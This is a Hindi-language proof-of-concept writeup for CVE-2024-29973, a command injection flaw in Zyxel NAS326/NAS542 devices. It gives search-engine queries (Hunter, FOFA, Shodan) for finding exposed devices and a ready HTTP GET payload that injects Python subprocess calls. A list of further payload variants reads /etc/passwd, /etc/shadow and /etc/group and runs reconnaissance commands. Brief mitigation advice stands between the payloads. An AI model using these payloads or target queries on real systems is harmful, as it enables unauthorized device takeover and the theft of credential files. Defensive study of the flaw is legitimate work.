
CVE-2024-29973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zyxel NAS डिवाइसों में रिमोट कमांड इंजेक्शन है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है।
CVE-2024-29973 कुछ Zyxel नेटवर्किंग उपकरणों में पाई जाने वाली एक गंभीर भेद्यता है। यह भेद्यता एक अनप्रमाणित हमलावर को फर्मवेयर में अनुचित इनपुट सत्यापन तंत्र का फायदा उठाकर लक्षित डिवाइस पर मनमाने कमांड निष्पादित करने की अनुमति देती है। हमलावर डिवाइस पर विशेष रूप से तैयार HTTP अनुरोध भेज सकते हैं, सिस्टम-स्तरीय कमांड इंजेक्ट कर सकते हैं और संभावित रूप से डिवाइस पर पूर्ण नियंत्रण प्राप्त कर सकते हैं।
Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"
कमांड इंजेक्शन: यह भेद्यता डिवाइस के वेब इंटरफेस में से एक में अपर्याप्त इनपुट सैनिटाइजेशन के कारण उत्पन्न होती है। यह दोष हमलावरों को HTTP अनुरोधों के मापदंडों के भीतर ऑपरेटिंग सिस्टम कमांड जोड़ने की अनुमति देता है।
एक्सप्लॉइट उदाहरण: हमलावर नीचे दिए गए HTTP GET अनुरोध के माध्यम से कमांड इंजेक्ट कर सकते हैं, मनमाना कोड निष्पादित करने के लिए:
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
प्रभाव: सफल शोषण के परिणामस्वरूप सिस्टम कमांड निष्पादित करने की क्षमता होती है, जिससे डिवाइस पर रिमोट नियंत्रण, डेटा रिसाव, या नेटवर्क से आगे समझौता हो सकता है।
इस भेद्यता से जुड़े जोखिमों को कम करने के लिए, इन चरणों का पालन करें:
फर्मवेयर अपडेट: सुनिश्चित करें कि सभी Zyxel डिवाइस नवीनतम फर्मवेयर संस्करण में अपडेट किए गए हैं। Zyxel ने पैच जारी किए हैं जो इस भेद्यता को संबोधित करते हैं। नियमित रूप से अपडेट की जांच करें और उन्हें तुरंत लागू करें।
नेटवर्क विभाजन: कमजोर डिवाइसों को महत्वपूर्ण नेटवर्क बुनियादी ढांचे से अलग करें। केवल आवश्यक सेवाओं को उजागर करें और सुनिश्चित करें कि प्रशासनिक इंटरफेस सार्वजनिक रूप से सुलभ नहीं हैं।
फ़ायरवॉल कॉन्फ़िगरेशन: आने वाले और बाहर जाने वाले ट्रैफ़िक को केवल आवश्यक सेवाओं तक सीमित करें। Zyxel डिवाइसों तक अनावश्यक HTTP पहुंच को ब्लॉक करें।
संदिग्ध गतिविधि की निगरानी करें: लॉगिंग और मॉनिटरिंग टूल लागू करें जो असामान्य व्यवहार का पता लगा सकते हैं और अलर्ट कर सकते हैं, जैसे बार-बार लॉगिन प्रयास या असामान्य ट्रैफ़िक पैटर्न।
संदर्भ नेशनल वल्नरेबिलिटी डेटाबेस - CVE-2024-29973 Zyxel सुरक्षा सलाह

GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1